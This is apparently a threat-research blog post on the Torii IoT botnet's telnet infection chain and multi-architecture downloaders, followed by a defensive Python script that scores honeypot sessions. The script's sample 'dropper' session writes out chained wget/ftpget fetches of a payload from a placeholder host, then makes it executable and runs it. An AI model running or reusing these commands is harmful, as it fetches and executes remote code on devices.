2018 has been a year where the Mirai and QBot variants just keep coming. Any script kiddie can now take the Mirai source code, make a few changes, give it a new Japanese-sounding name, and release it as a new botnet.

Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and the other botnets we know of, particularly in the advanced techniques it uses. Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual things a botnet does, such as DDoS, attacking every other device reachable on the internet, or, of course, mining cryptocurrencies. Instead, it comes with a rich set of features for exfiltrating (sensitive) information, a modular architecture capable of fetching and executing further commands and executables, and multiple layers of encrypted communication for all of it.

Furthermore, Torii can infect a wide range of devices, as it supports a wide range of target architectures, including MIPS, ARM, x86, x64, PowerPC, SuperH, and others. Definitely one of the largest sets we have seen so far.

As we have been digging into this strain, we have found indications that this operation has been running since December 2017, maybe even longer.

We would like to give credit to the security researcher who tweeted about a sample of this strain hitting his telnet honeypot last week. According to him, the telnet attacks have been coming to his honeypot from Tor exit nodes, so we decided to name this botnet strain "Torii".

In this post, we describe what we know about this strain so far: how it spreads, what its stages are, and some of its features. The analysis is still ongoing, and further findings will be added in updates to this post.

Now, let's start with the infection vector.

The infection chain starts with a telnet attack on the weak credentials of targeted devices, followed by execution of an initial shell script. This script looks quite different from the scripts IoT malware typically uses: it is far more sophisticated.

The script first tries to discover the architecture of the targeted device and then attempts to download the payload built for that architecture. The list of architectures Torii supports is quite impressive: x86_64, x86, ARM, MIPS, Motorola 68k, SuperH and PPC, in various bit widths and endiannesses. This allows Torii to infect a wide range of devices running on these very common architectures.

To download the binary payload, the script tries several commands in turn: wget, ftpget, ftp, busybox wget and busybox ftpget. Using multiple downloaders maximizes the likelihood that at least one of them exists on the target and the payload can be delivered; on stripped-down embedded Linux systems the standalone tools are often absent and only the BusyBox applets are available, which is why both forms are tried.
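The dropper behaviour described above (architecture discovery, then a chain of fallback downloaders) is also a useful detection signal on a telnet honeypot or on captured session logs: a legitimate interactive session rarely invokes several different download tools for the same file. The following triage heuristic is an added example written for this post, not code from the Avast analysis or from Torii itself. It assumes the captured session is available as a list of shell command lines, and it approximates "architecture discovery" by looking for `uname -m` or reads of `/proc/cpuinfo` and for architecture names in payload filenames; the post does not say how Torii's script actually probes the architecture, so those markers, the scoring weights and the two sample sessions are all constructed for this example.

```python
"""Heuristic triage of captured telnet sessions for Torii-style droppers.

Added example, not code from the original post. The downloader names and
architecture families come from the post; the probe patterns, filename
hints, sample sessions and scoring weights are assumptions of this example.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass, field

# Standalone download tools named in the post, plus the BusyBox applets
# ("busybox wget" / "busybox ftpget") that are matched as a two-token pair.
DOWNLOADERS = ("wget", "ftpget", "ftp")
BUSYBOX_APPLETS = ("wget", "ftpget")

# Architecture families listed in the post, keyed by filename substrings
# (the substrings themselves are an assumption of this example).
ARCH_HINTS = {
    "x86_64": ("x86_64", "x64", "amd64"),
    "x86": ("x86", "i386", "i686"),
    "arm": ("arm",),
    "mips": ("mips",),
    "m68k": ("m68k",),
    "superh": ("sh4", "superh"),
    "ppc": ("ppc", "powerpc"),
}

ARCH_PROBE = re.compile(r"\buname\s+-[a-z]*m\b|/proc/cpuinfo")  # assumed probe
SEPARATORS = re.compile(r"\|\||&&|;")  # split a line into simple commands


@dataclass
class Verdict:
    downloaders: set[str] = field(default_factory=set)
    arch_probe: bool = False
    arch_targets: set[str] = field(default_factory=set)
    fallback_chains: int = 0  # lines chaining >= 2 downloaders with "||"
    score: int = 0
    suspicious: bool = False


def _tokens(cmd: str) -> list[str]:
    try:
        return shlex.split(cmd)
    except ValueError:  # unbalanced quotes in captured input
        return cmd.split()


def _downloader(tokens: list[str]) -> str | None:
    """Return the download tool a simple command invokes, or None."""
    if not tokens:
        return None
    if tokens[0] == "busybox" and len(tokens) > 1 and tokens[1] in BUSYBOX_APPLETS:
        return "busybox " + tokens[1]
    if tokens[0] in DOWNLOADERS:
        return tokens[0]
    return None


def _arch_hints(tokens: list[str]) -> set[str]:
    """Architecture families hinted by the arguments of a download command."""
    found = set()
    for tok in tokens[1:]:
        low = tok.lower()
        for arch, hints in ARCH_HINTS.items():
            if any(h in low for h in hints):
                found.add(arch)
    return found


def triage(session: list[str]) -> Verdict:
    v = Verdict()
    for line in session:
        if ARCH_PROBE.search(line):
            v.arch_probe = True
        line_tools: set[str] = set()
        for cmd in SEPARATORS.split(line):
            toks = _tokens(cmd.strip())
            tool = _downloader(toks)
            if tool is None:
                continue
            line_tools.add(tool)
            v.arch_targets |= _arch_hints(toks)
        v.downloaders |= line_tools
        if "||" in line and len(line_tools) >= 2:
            v.fallback_chains += 1
    # Weights are this example's own choice, not a published threshold.
    if len(v.downloaders) >= 2:
        v.score += 2
    if len(v.downloaders) >= 3:
        v.score += 1
    v.score += int(v.arch_probe) + int(bool(v.arch_targets)) + int(v.fallback_chains > 0)
    v.suspicious = v.score >= 3
    return v


# Constructed sample sessions (not real captures); 198.51.100.0/24 is a
# documentation range, so the URLs resolve to nothing.
SAMPLE_SESSION = [
    "enable",
    "sh",
    "cd /tmp || cd /var/run || cd /dev/shm",
    "uname -m",
    "wget http://198.51.100.7/bins/payload.arm -O .t || busybox wget http://198.51.100.7/bins/payload.arm -O .t",
    "ftpget 198.51.100.7 .t bins/payload.arm || busybox ftpget 198.51.100.7 .t bins/payload.arm",
    "chmod +x .t; ./.t",
]
BENIGN_SESSION = [
    "uname -a",
    "wget https://example.com/update.tar.gz -O /tmp/update.tar.gz",
    "tar xzf /tmp/update.tar.gz -C /opt",
]

if __name__ == "__main__":
    for name, sess in (("dropper", SAMPLE_SESSION), ("benign", BENIGN_SESSION)):
        print(name, triage(sess))
```

The heuristic deliberately scores the combination of signals rather than any single one: a lone `wget` is normal, and a single `uname -m` is normal, but a session that probes the CPU and then chains four different downloaders for an architecture-named binary is the pattern the post describes. On a real honeypot you would feed it the commands recorded per TCP session and use the `Verdict` fields, not just the boolean, to decide what to retain for analysis.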